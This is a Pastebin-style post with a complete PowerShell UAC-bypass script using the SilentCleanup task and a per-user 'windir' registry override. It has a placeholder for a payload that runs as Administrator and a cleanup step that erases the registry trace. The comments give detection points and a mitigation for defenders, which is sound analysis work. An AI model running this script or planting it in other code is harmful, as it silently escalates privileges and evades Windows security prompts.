mymoishy

uac-bypass

Jan 14th, 2020
  # UAC-bypass sample (PowerShell), annotated for analysis and detection.
  # The pattern is publicly documented as the SilentCleanup / per-user "windir"
  # override and falls under MITRE ATT&CK T1548.002 (Bypass User Account Control).
  #
  # Flow visible in this listing:
  #   - If the current token's group list matches the Administrators SID, the
  #     payload placeholder runs.
  #   - Otherwise the script writes a "windir" value under HKCU:\Environment that
  #     relaunches this same script, starts the SilentCleanup scheduled task,
  #     and then deletes the value again.
  #
  # Detection points for defenders:
  #   - Any "windir" value under HKCU\Environment. windir is normally defined
  #     machine-wide only, so a per-user value is anomalous. The value is deleted
  #     at the end of the script, so event-based registry auditing (e.g. Sysmon
  #     event IDs 12/13) is needed; a later point-in-time scan will miss it.
  #   - schtasks.exe started with "/run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup"
  #     by an interactive, non-elevated process.
  #   - powershell.exe started with "-ep bypass -w h" shortly after that task runs.
  # Mitigation: the else branch needs no credentials or prompt, which suggests it
  # only helps an account that is already a local Administrators member running
  # unelevated; day-to-day use of standard (non-admin) accounts removes that precondition.

  # S-1-5-32-544 is the well-known SID of BUILTIN\Administrators. The author uses
  # its presence in the current identity's groups as an "already elevated" test.
  if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
  #Payload goes here
  #It'll run as Administrator
  } else {
  # Per-user environment variables are stored here; any user can write to their own hive.
  $registryPath = "HKCU:\Environment"
  $Name = "windir"
  # -ep bypass = -ExecutionPolicy Bypass, -w h = -WindowStyle Hidden; $PSCommandPath is
  # this script's own path, so the value re-runs the script (taking the branch above).
  # NOTE(review): the trailing ";#" presumably comments out whatever follows the
  # variable once it is expanded inside the task's command line - confirm against the task action.
  $Value = "powershell -ep bypass -w h $PSCommandPath;#"
  # PowerShell variable names are case-insensitive, so $name below is $Name.
  Set-ItemProperty -Path $registryPath -Name $name -Value $Value
  #Depending on the performance of the machine, some sleep time may be required before or after schtasks
  # /I runs the task immediately, ignoring its constraints; output is discarded.
  schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null
  # Cleanup: removes the override, leaving no persistent registry artifact.
  Remove-ItemProperty -Path $registryPath -Name $name
  }